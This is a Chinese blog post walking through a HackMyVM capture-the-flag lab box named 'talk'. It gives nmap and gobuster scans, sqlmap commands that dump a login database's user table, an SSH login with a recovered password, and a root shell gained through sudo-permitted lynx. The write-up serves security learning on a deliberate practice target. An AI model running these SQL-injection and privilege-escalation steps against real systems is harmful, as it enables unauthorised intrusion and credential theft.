freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

记一次hackmyvm综合靶场的渗透测试-talk
2022-04-10 09:51:42
所属地 黑龙江省

前言

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

信息收集阶段

Kali攻击机:192.168.1.128

靶机:192.168.1.117

目标:root.txt和user.txt

nmap -A -p1-65535 192.168.1.117

1649555193_625236f91638386456a0a.png!small?1649555193401

开了22端口和80端口:

漏洞利用阶段

访问下80端口!登录界面!

1649555219_625237133e4a6cf9245eb.png!small?1649555219503

并且可以注册账户!

1649555223_6252371797ac2ef8d29ef.png!small?1649555223836

查看下源代码!一些信息啥用,暂时不知道!

1649555230_6252371e040a2f035e1de.png!small?1649555230223

注册个账户,看看!

1649555235_6252372326af77769b30f.png!small?1649555235403

1649555240_625237289821f30974658.png!small?1649555240829

1649555245_6252372d51e1397c9877e.png!small?1649555245602

这个应该是用户名!放着往下走!

目录扫描走起!

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.117/ -x txt,php,html

1649555259_6252373ba4808b3c10ffd.png!small?1649555259938

访问下看看!没啥东东,下一步走起!

开启BURP,看看有没有登录框的SQL注入漏洞!

先抓个包,用户名和密码是以POST方式提交!

1649555273_62523749a203114e7efb2.png!small?1649555273903

Sqlmap跑起来!

当前数据库:

python3 /usr/share/sqlmap/sqlmap.py -r post.txt --dbs --batch

1649555320_62523778b269b33c55760.png!small?1649555320931

爆破表走起:

python3 /usr/share/sqlmap/sqlmap.py -r post.txt -D chat --tables --batch

1649555337_6252378973b01f614bd07.png!small?1649555337738

爆破值走起:

python3 /usr/share/sqlmap/sqlmap.py -r post.txt -D chat -T user --dump --batch

画框账户是我新建的!

1649555355_6252379be5797428f2282.png!small?1649555356246

我们用这些密码尝试下ssh连接!最终为nona账户可以登录!!

根据以上的聊天内容,知道系统已被hack!密码是混乱的!

使用的密码是:thatsmynonapass

1649555370_625237aa6b709a81935f8.png!small?1649555370645

得到了第一个flag:cat user.txt

wor*****s

权限提升阶段

接着需要提权到root账户!

1649555377_625237b1981f31260f69a.png!small?1649555377866

1649555387_625237bb5399f39b8e4bd.png!small?1649555387582

这里了解当前用户以root权限执行/usr/bin/lynx

我们这了解下这是个啥?

lynx命令是纯文本模式的网页浏览器,不支持图形、音视频等多媒体信息。

1649555407_625237cfb47c4cc39e252.png!small?1649555407933

https://ywnz.com/linux/lynx/

其他命令:!:回到shell提示符下。

sudo -u root /usr/bin/lynx

然后按!号,回到shell提示符下

1649555414_625237d627e8efd7838b6.png!small?1649555414406

1649555423_625237dfd395ff0cef705.png!small?1649555424155

最后的flag:

cat root.txt

talk************ot

# 渗透测试 # web安全 # CTF # 靶场平台 # 靶场实战
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录